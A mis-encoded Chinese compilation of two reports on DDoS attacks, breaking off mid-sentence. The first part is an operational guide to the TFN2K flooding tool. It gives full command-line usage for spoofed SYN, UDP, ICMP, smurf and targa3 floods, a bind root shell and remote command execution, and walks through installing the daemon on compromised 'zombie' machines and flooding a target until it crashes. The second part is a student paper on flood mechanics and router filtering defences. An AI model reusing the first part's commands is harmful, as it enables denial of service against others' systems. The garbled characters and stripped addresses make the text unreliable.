DDOS攻擊的實(shí)驗(yàn)報(bào)告

篇一：ddos攻擊實(shí)驗(yàn)這里主要介紹tfn2k，因?yàn)樗钪?！主要分為使用說(shuō)明，攻擊實(shí)例，程序分析，防范手段等幾部分。這里主要介紹tfn2k，因?yàn)樗钪铮≈饕譃槭褂谜f(shuō)明，攻擊實(shí)例，程序分析，防范手段等幾部分。簡(jiǎn)介：tfn被認(rèn)為是當(dāng)今功能最強(qiáng)性能最好的dos攻擊工具，幾乎不可能被察覺(jué)。作者發(fā)布這個(gè)工具的出發(fā)點(diǎn)是什么呢？作者向你保證它不會(huì)傷害公司或個(gè)人。但是它會(huì)嚇一嚇那些不關(guān)心系統(tǒng)安全的人，因?yàn)楝F(xiàn)在精密的工具被不斷改善，并且被私人持有，他們?cè)S多都是不可預(yù)測(cè)的?，F(xiàn)在是每一個(gè)人都清醒的時(shí)候了，每一個(gè)人都應(yīng)該意識(shí)到假如他不足夠關(guān)心他的安全問(wèn)題，最壞的情形就會(huì)發(fā)生。因此這個(gè)程序被設(shè)計(jì)成大多數(shù)的操作系統(tǒng)可以編譯，以表明現(xiàn)在的操作系統(tǒng)沒(méi)有特別安全的，包括windows,solaris,linux及其他各種unix.特點(diǎn)描述：tfn使用了分布式客戶服務(wù)器功能，加密技術(shù)及其它類的功能，它能被用于控制任意數(shù)量的遠(yuǎn)程機(jī)器，以產(chǎn)生隨機(jī)匿名的拒絕服務(wù)攻擊和遠(yuǎn)程訪問(wèn)。此版本的新特點(diǎn)包括：1。功能性增加:為分布式執(zhí)行控制的遠(yuǎn)程單路命令執(zhí)行對(duì)軟弱路由器的混合攻擊對(duì)有ip棧弱點(diǎn)的系統(tǒng)發(fā)動(dòng)targa3攻擊對(duì)許多unix系統(tǒng)和winnt的兼容性。2。匿名秘密的客戶服務(wù)器通訊使用：假的源地址高級(jí)加密單路通訊協(xié)議通過(guò)隨機(jī)ip協(xié)議發(fā)送消息誘騙包編譯：在編譯之前，先要編輯src/makefile文件修改選項(xiàng)符合你的操作系統(tǒng)。建議你看一下src/config.h然后修改一些重要的缺省值。一旦你開始編譯，你會(huì)被提示輸入一個(gè)8--32位的服務(wù)器密碼。如果你使用require_pass類型編譯，在使用客戶端時(shí)你必須輸入這個(gè)密碼。安裝：tfn服務(wù)器端被安裝運(yùn)行于主機(jī)，身份是root（或euidroot）。它將用自己的方式提交系統(tǒng)配置的改變，于是如果系統(tǒng)重啟你也得重啟。一旦服務(wù)器端被安裝，你就可以把主機(jī)名加入你的列表了（當(dāng)然你也可以聯(lián)系單個(gè)的服務(wù)器端）。tfn的客戶端可以運(yùn)行在shell(root)和windows命令行(管理員權(quán)限需要在nt上).使用客戶端：客戶端用于聯(lián)系服務(wù)器端，可以改變服務(wù)器端的配置，衍生一個(gè)shell,控制攻擊許多其它的機(jī)器。你可以tfn-ffile從一個(gè)主機(jī)名文件讀取主機(jī)名，也可以使用tfn-hhostname聯(lián)系一個(gè)服務(wù)器端。缺省的命令是通過(guò)殺死所有的子線程停止攻擊。命令一般用-c.請(qǐng)看下面的命令行描述。選項(xiàng)-i需要給命令一個(gè)值，分析目標(biāo)主機(jī)字符串，這個(gè)目標(biāo)主機(jī)字符串缺省用分界符@。當(dāng)使用smurfflood時(shí)，只有第一個(gè)是被攻擊主機(jī)，其余被用于直接廣播。id1-反欺騙級(jí)：服務(wù)器產(chǎn)生的dos攻擊總是來(lái)源于虛假的源地址。通過(guò)這個(gè)命令，你可以控制ip地址的哪些部分是虛假的，哪些部分是真實(shí)的ip。id2-改變包尺寸：缺省的icmp/8,smurf,udp攻擊缺省使用最小包。你可以通過(guò)改變每個(gè)包的有效載荷的字節(jié)增加它的大小。id3-綁定rootshell:啟動(dòng)一個(gè)會(huì)話服務(wù)，然后你連接一個(gè)指定端口就可以得到一個(gè)rootshell。id4-udpflood攻擊：這個(gè)攻擊是利用這樣一個(gè)事實(shí)：每個(gè)udp包被送往一個(gè)關(guān)閉的端口，這樣就會(huì)有一個(gè)icmp不可到達(dá)的信息返回，增加了攻擊的能力。id5-synflood攻擊：這個(gè)攻擊有規(guī)律的送虛假的連接請(qǐng)求。結(jié)果會(huì)是目標(biāo)端口拒絕服務(wù)，添瞞tcp連接表，通過(guò)對(duì)不存在主機(jī)的tcp/rst響應(yīng)增加攻擊潛力。id6-icmp響應(yīng)(ping)攻擊：這個(gè)攻擊發(fā)送虛假地址的ping請(qǐng)求，目標(biāo)主機(jī)會(huì)回送相同大小的響應(yīng)包。id7-smurf攻擊：用目標(biāo)主機(jī)的地址發(fā)送ping請(qǐng)求以廣播擴(kuò)大，這樣目標(biāo)主機(jī)將得到回復(fù)一個(gè)多倍的回復(fù)。id8-mix攻擊：按照1:1:1的關(guān)系交替的發(fā)送udp,syn,icmp包，這樣就可以對(duì)付路由器，其它包轉(zhuǎn)發(fā)設(shè)備，nids,sniffers等。id9-targa3攻擊id10-遠(yuǎn)程命令執(zhí)行：給予單路在服務(wù)器上執(zhí)行大量遠(yuǎn)程命令的機(jī)會(huì)。更復(fù)雜的用法請(qǐng)看4.1節(jié)。更多的選項(xiàng)請(qǐng)看命令行幫助。使用tfn用于分布式任務(wù)usingtfnforotherdistributedtasks依照cert的安全報(bào)告，新版本的ddos工具包含一個(gè)最新流行的特點(diǎn)：軟件的自我更新。tfn也有這個(gè)功能，作者并沒(méi)有顯式的包含這個(gè)功能。在id10遠(yuǎn)程執(zhí)行命令中給予用戶在任意數(shù)量遠(yuǎn)程主機(jī)上以批處理的形式執(zhí)行同樣shell命令的能力。這同時(shí)也證明了一個(gè)問(wèn)題：ddos等類似的分布式網(wǎng)絡(luò)工具不僅僅簡(jiǎn)單的用于拒絕服務(wù)，還可以做許多實(shí)際的事情。使用方法：usage:./tfnusesarandomprotocolasdefault[-dn]sendoutnbogusrequestsforeachrealonetodecoytargets[-shost/ip]specifyyoursourceip.randomlyspoofedbydefault,youneedtouseyourrealipifyouarebehindspoof-filteringrouters[-fhostlist]filenamecontainingalistofhostswithtfnserverstocontact[-hhostname]tocontactonlyasinglehostrunningatfnserver[-itargetstring]containsoptions/targetsseparatedby@,seebelow[-pport]atcpdestinationportcanbespecifiedforsynfloods-changeipantispoof-level(evaderfc2267filtering)usage:-i0(fullyspoofed)to-i3(/24hostbytesspoofed)-changepacketsize,usage:-i-bindrootshelltoaport,usage:-i-udpflood,usage:-ivictim@victim2@victim3@...-tcp/synflood,usage:-ivictim@...[-pdestinationport]-icmp/pingflood,usage:-ivictim@...-icmp/smurfflood,usage:-ivictim@broadcast@broadcast2@...-mixflood(udp/tcp/icmpinterchanged),usage:-ivictim@...-targa3flood(ipstackpenetration),usage:-ivictim@...繼續(xù)上一次的文章，這一次是攻擊測(cè)試。測(cè)試環(huán)境：共有5臺(tái)機(jī)器，是在五臺(tái)redhatlinux6.2上測(cè)試的。58測(cè)試目的：？？？？？（感受一下yahoo怎么被攻擊的）簡(jiǎn)要介紹：我們的測(cè)試目的是用5指揮,,三臺(tái)機(jī)器對(duì)8發(fā)動(dòng)攻擊。(實(shí)際攻擊中就不止三臺(tái)了。)因此我們的步驟如下：0。黑客攻擊時(shí)事先要控制,,,5這四臺(tái)機(jī)器。也就是我們俗稱的“肉雞”。1。編譯代碼。2。在,,上安裝td。3。在5安裝tfn。4。由5指揮,,對(duì)8發(fā)動(dòng)攻擊。5。攻擊結(jié)束。詳細(xì)步驟：0。黑客攻擊時(shí)事先要控制,,,5這四臺(tái)機(jī)器。這一步我就不說(shuō)了，大家一定有辦法。。。1。編譯代碼。假設(shè)在5上。。。首先一定要有root權(quán)限$su#解開文件:#tarzxvftfn2k.tgz#cdtfn2k如果你不是linux或者bsd請(qǐng)修改src下的makefile文件。(有一網(wǎng)友問(wèn)佳佳，solaris為什么不行。如果你修改了makefile,把linux改成了solaris仍然不行，佳佳也不知道了，因?yàn)榧鸭褯](méi)有solaris的測(cè)試環(huán)境。)#makemake過(guò)程中會(huì)讓你輸入一個(gè)密碼，8--32位的。那就輸入一個(gè)吧，將來(lái)tfn和td聯(lián)系時(shí)需要這個(gè)密碼。我輸入的是：aaaabbbbmake完成你會(huì)發(fā)現(xiàn)，多了兩個(gè)可執(zhí)行文件:tfn,td2。在,,上安裝td。#ftpftp>binfpt>puttdftp>byftp的具體步驟我就不說(shuō)了，大家一定都知道。同樣方法：ftpftp然后在分別在,,上#./td注意一定要有root權(quán)限，否則無(wú)法運(yùn)行。3。在5安裝tfn。由于我們是在5上編譯的，tfn就已經(jīng)在了。4。由5指揮,,對(duì)8發(fā)動(dòng)攻擊。好了，我們終于完成了準(zhǔn)備工作，攻擊可以開始了。。。我現(xiàn)在在5的/tfn2k/目錄下。。。我們需要編輯一個(gè)文件列表。#vihosts.txt文件第一行輸入：文件第二行輸入：文件第三行輸入：這就是控制文件列表。然后我們測(cè)試一下連接。在5上。。。下面的命令意思是：在hosts.txt文件中的機(jī)器上執(zhí)行遠(yuǎn)程命令“mkdirjjgirl”,其中-c10表示執(zhí)行遠(yuǎn)程命令。執(zhí)行完這個(gè)命令就會(huì)在那三臺(tái)機(jī)器上都建立jjgirl目錄。當(dāng)然你可以隨便執(zhí)行其他的命令。#./tfn-fhosts.txt-c10-imkdirjjgirlprotocol:randomsourceip:randomclientinput:listpasswordverification:（這時(shí)我們輸入密碼：aaaabbbb）sendingoutpackets:.好了，完成。然后我們?cè)谏蠄?zhí)行：#find/-namejjgirl-print好，找到了。說(shuō)明我們連接成功。。。下面開始正式攻擊了。。。你可以在上：#./ntop運(yùn)行ntop查看流量。先來(lái)icmp攻擊#./tfn-fhosts.txt-c6-i8（十分鐘，8就死機(jī)了）重啟，接著測(cè)試。。。syn/tcp攻擊：#./tfn-fhosts.txt-c5-i8-p80udp攻擊：#./tfn-fhosts.txt-c4-i8icmp/tcp/udp輪流攻擊：篇二：計(jì)算機(jī)安全技術(shù)大作業(yè)實(shí)驗(yàn)報(bào)告-ddos攻擊的原理及防范上海電力學(xué)院計(jì)算機(jī)安全技術(shù)大作業(yè)題目:ddos攻擊的原理及防范學(xué)號(hào)：學(xué)生姓名：院系：專業(yè)：班級(jí)：2012年5月28日摘要：ddos攻擊手段是在傳統(tǒng)的dos攻擊基礎(chǔ)之上產(chǎn)生的一類攻擊方式，他借助于客戶/服務(wù)器技術(shù)，將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái)，對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)dos攻擊，從而成倍的提高拒絕服務(wù)攻擊的威力。關(guān)鍵字：ddos攻擊，dos攻擊，syn攻擊，smurf攻擊，攻擊原理，防御辦法，傀儡機(jī)引言：ddos是distributeddenialofservice的簡(jiǎn)寫，意為分布式拒絕服務(wù)攻擊，是對(duì)dos（denialofservice）拒絕服務(wù)攻擊的發(fā)展。這里，我們先來(lái)了解一下什么是dos。正文：【dos攻擊簡(jiǎn)介】dos攻擊的目的是使目標(biāo)計(jì)算機(jī)或網(wǎng)絡(luò)無(wú)法提供正常的服務(wù)。最常見(jiàn)的dos攻擊有計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊就是以龐大的通信量沖擊網(wǎng)絡(luò)，使所有可用的網(wǎng)絡(luò)資源都被耗盡，最后導(dǎo)致合法用戶的請(qǐng)求無(wú)法通過(guò)；類似于一大群人同時(shí)沖向一個(gè)安全出口，則會(huì)造成安全出口的阻塞，導(dǎo)致其他人都無(wú)法通過(guò)出口。而連通性攻擊是指使用大量的連接請(qǐng)求沖擊服務(wù)器，使所有可用的操作系統(tǒng)資源都被消耗殆盡，最終計(jì)算機(jī)無(wú)法再處理合法用戶的請(qǐng)求；即服務(wù)器忙于處理攻擊者的連接請(qǐng)求而無(wú)暇理睬合法用戶的正常請(qǐng)求，此時(shí)從合法用戶的角度來(lái)看就是服務(wù)器失去響應(yīng)。smurf攻擊（帶寬攻擊）smurf攻擊并不直接對(duì)目標(biāo)主機(jī)發(fā)送服務(wù)請(qǐng)求包，攻擊者在遠(yuǎn)程機(jī)器上發(fā)送icmp答應(yīng)請(qǐng)求ping服務(wù)，但這個(gè)ping命令的目的地址不是某個(gè)主機(jī)的ip地址，是某個(gè)網(wǎng)絡(luò)的廣播地址（即目標(biāo)ip地址為“ff·ff·ff·ff”），并且這個(gè)ping命令的源地址被偽造成了將要攻擊的主機(jī)ip地址。這樣，收到廣播ping命令后的主機(jī)，都會(huì)按數(shù)據(jù)包中所謂的源ip地址返回請(qǐng)求信息，向被攻擊的主機(jī)發(fā)送echo響應(yīng)包作為回答。大量同時(shí)返回的echo響應(yīng)數(shù)據(jù)包會(huì)造成目標(biāo)網(wǎng)絡(luò)嚴(yán)重?fù)砣?、丟包，甚至完全崩潰。syn攻擊（連通性攻擊）syn攻擊是利用現(xiàn)有tcp/ip協(xié)議族的設(shè)計(jì)弱點(diǎn)和缺陷。在tcp/ip協(xié)議的三次握手協(xié)議過(guò)程如下：（1）第一次握手?？蛻舳税l(fā)送syn包到服務(wù)器，向服務(wù)端提出連接請(qǐng)求，這時(shí)tcpsyn標(biāo)志置位（syn=j），客戶端在tcp包頭的序列號(hào)區(qū)中插入自己的isn。（2）第二次握手。服務(wù)器收到客戶的請(qǐng)求信息，必須回應(yīng)一個(gè)確認(rèn)信號(hào)，確認(rèn)客戶的syn(ack標(biāo)志置位為j+1)，同時(shí)也發(fā)送一個(gè)自己的syn包（syn置位為k），即syn+ack包，此時(shí)服務(wù)器進(jìn)入syn_recv狀態(tài)。（3）第三次握手。客戶端收到服務(wù)器的syn+ack包，想服務(wù)器發(fā)送確認(rèn)包ack（ack置位為k+1），此包發(fā)送完畢標(biāo)志建立了完整的tcp連接，客戶端和服務(wù)器進(jìn)入established狀態(tài)，可以開始全雙工模式的數(shù)據(jù)傳輸過(guò)程。假設(shè)一個(gè)用戶想服務(wù)器發(fā)送了syn報(bào)文后突然死機(jī)或掉線，那么服務(wù)器在發(fā)出syn+ack應(yīng)答報(bào)文后是無(wú)法收到客戶端的ack報(bào)文的（第三次握手無(wú)法完成），在這種情況下服務(wù)器端一般會(huì)重試（再次發(fā)送syn+ack）給客戶端，并且等待一段時(shí)間后丟棄這個(gè)未完成的連接，這段時(shí)間的長(zhǎng)度一般是30秒~2分鐘。如果一個(gè)用戶出現(xiàn)異常導(dǎo)致服務(wù)器的一個(gè)線程等待1分鐘并不是大問(wèn)題，但如果有一個(gè)惡意攻擊者大量模擬這種情況，服務(wù)器端為了維護(hù)一個(gè)非常大的半連接列表而消耗非常多的資源——數(shù)以萬(wàn)計(jì)的半連接，即使是簡(jiǎn)單的保存及遍歷也會(huì)非常消耗很多的cpu時(shí)間和內(nèi)存，何況還要不斷對(duì)這個(gè)半連接列表中的ip進(jìn)行syn+ack的重試。如果服務(wù)器的tcp/ip棧不夠強(qiáng)大，最后的結(jié)果往往是堆棧溢出崩潰——及時(shí)服務(wù)器的系統(tǒng)足夠強(qiáng)大，服務(wù)器端也會(huì)忙于處理攻擊者偽造的tcp連接請(qǐng)求而無(wú)暇理睬客戶的正常請(qǐng)求。這種情況叫做服務(wù)器端收到了synflood攻擊（syn洪水攻擊）。【ddos攻擊原理簡(jiǎn)介】ddos攻擊手段是在傳統(tǒng)的dos攻擊基礎(chǔ)之上產(chǎn)生的一類攻擊方式。單一的dos攻擊一般是采用一對(duì)一方式的，它的攻擊方法說(shuō)白了就是單挑，是比誰(shuí)的機(jī)器性能好、速度快。當(dāng)攻擊目標(biāo)cpu速度低、內(nèi)存小或者網(wǎng)絡(luò)帶寬小等等各項(xiàng)性能指標(biāo)不高時(shí)，他的效果是明顯的。但隨著計(jì)算機(jī)處理能力的迅速增長(zhǎng)，內(nèi)存大大增加，cpu運(yùn)算能力越來(lái)越強(qiáng)大，這使得dos攻擊的困難程度加大了。被攻擊者對(duì)惡意攻擊包的抵抗能力加強(qiáng)的不少。這時(shí)候分布式的拒絕服務(wù)攻擊手段就應(yīng)運(yùn)而生了。所謂分布式拒絕服務(wù)（ddos）攻擊是指借助于客戶/服務(wù)器技術(shù)，將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái)，對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)dos攻擊，從而成倍的提高拒絕服務(wù)攻擊的威力。如圖，一個(gè)比較完善的ddos攻擊體系分成四大部分。第1部分：由黑客操控的主控計(jì)算機(jī)；第2部分：由黑客直接控制的控制傀儡機(jī)；第3部分：由控制傀儡機(jī)控制的攻擊傀儡機(jī)；第4部分：受害者。其中第2部分可由多臺(tái)控制傀儡機(jī)構(gòu)成。對(duì)受害者來(lái)說(shuō)，ddos的實(shí)際攻擊包是從第3部分攻擊傀儡機(jī)上發(fā)出的，第2部分的控制傀儡及只發(fā)命令而不參與實(shí)際的攻擊。對(duì)第2和第3部分計(jì)算機(jī)，黑客有控制權(quán)或者是部分的控制權(quán)，并把相應(yīng)的ddos程序傳到這些平臺(tái)上，這些程序與正常程序一樣運(yùn)行，并等待來(lái)自黑客的指令，通常這些程序還會(huì)利用各種手段隱藏自己不被別人發(fā)現(xiàn)。在平時(shí)，這些傀儡機(jī)器并沒(méi)有什么異常，但一旦黑客連接到它們進(jìn)行控制，并發(fā)出指令的時(shí)候，攻擊傀儡機(jī)就成為打手去對(duì)受害者發(fā)起攻擊了。一般情況下黑客不直接控制第3部分的攻擊傀儡機(jī)，而要從控制傀儡機(jī)上中轉(zhuǎn)一下，這就導(dǎo)致ddos攻擊難以追查。攻擊者為了反偵察，都會(huì)清理日志擦掉腳印。狡猾的攻擊者不會(huì)清空日志，這樣容易被人發(fā)覺(jué)，黑客們會(huì)挑有關(guān)自己不良行為的日志項(xiàng)目刪掉，讓人看不到異常情況。這樣可以長(zhǎng)時(shí)間的利用控制傀儡機(jī)。在傀儡機(jī)上清理日志是一項(xiàng)龐大的工程，所以黑客一般控制少數(shù)的控制傀儡機(jī)就足夠了，而控制傀儡機(jī)一臺(tái)就可以控制幾十臺(tái)攻擊機(jī)?！綿dos的防范】對(duì)于smurf類型ddos攻擊的防范首先，千萬(wàn)不能讓自己網(wǎng)絡(luò)里的人發(fā)起這樣的攻擊。在smurf攻擊中，有大量的源欺騙的ip數(shù)據(jù)包離開了第一個(gè)網(wǎng)絡(luò)。所以我們通過(guò)在局域網(wǎng)的邊界路由器上使用輸出過(guò)濾，從而阻止自己網(wǎng)絡(luò)中其他人向局域網(wǎng)外發(fā)送的源欺騙smurf攻擊。在路由器上增加這類過(guò)濾規(guī)則的命令是：【access-list100permitip{你的網(wǎng)絡(luò)號(hào)}{你的網(wǎng)絡(luò)子網(wǎng)掩碼}any】【access-list100denyipanyany】其次，停止自己的網(wǎng)絡(luò)作為中間代理。如果沒(méi)有必須要向外發(fā)送廣播數(shù)據(jù)包的情況，就可以在路由器的每個(gè)接口上設(shè)置禁止直接廣播，命令如下：【noipdirected-broadcast】如果自己所在的網(wǎng)絡(luò)比較大，具有多個(gè)羅尤其，那么可以在邊界路由器上使用以下命令：【ipverifyunicastreverse-path】讓路由器對(duì)具有相反路徑的icmp欺騙數(shù)據(jù)包進(jìn)行校驗(yàn)，丟棄那些沒(méi)有路徑存在的包。最好是運(yùn)行cisco快速轉(zhuǎn)發(fā)，或者其他相應(yīng)的軟件。這是因?yàn)樵诼酚善鞯腸ef表中，列出了該數(shù)據(jù)包所到達(dá)網(wǎng)絡(luò)接口的所有路由項(xiàng)，如果沒(méi)有該數(shù)據(jù)包源ip地址的路由，路由器將丟棄該數(shù)據(jù)包。例如，路由器接收到一個(gè)源ip地址為的數(shù)據(jù)包，如果cef路由表中沒(méi)有為ip地址提供任何路由（即反向數(shù)據(jù)包傳輸時(shí)所需的路由），則路由器會(huì)丟棄它。對(duì)于syn類型ddos攻擊的防范：到目前為止，進(jìn)行syn類型的ddos攻擊的防御還是比較困難的。這種攻擊的特點(diǎn)是它利用了tcp/ip協(xié)議的漏洞，除非你不用tcp/ip，才有可能完全抵御住ddos攻擊。雖然它難于防范，但防止ddos并不是絕對(duì)不可行的事情?；ヂ?lián)網(wǎng)的使用者是各種各樣的，與ddos做斗爭(zhēng)，不同的角色有不同的任務(wù)：?企業(yè)網(wǎng)管理員?isp、icp管理員?骨干網(wǎng)絡(luò)運(yùn)